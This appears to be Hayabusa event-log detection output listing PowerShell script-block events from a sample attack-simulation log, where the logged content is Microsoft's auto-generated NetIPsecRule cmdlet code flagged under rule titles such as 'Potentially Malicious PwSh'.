'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters,",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 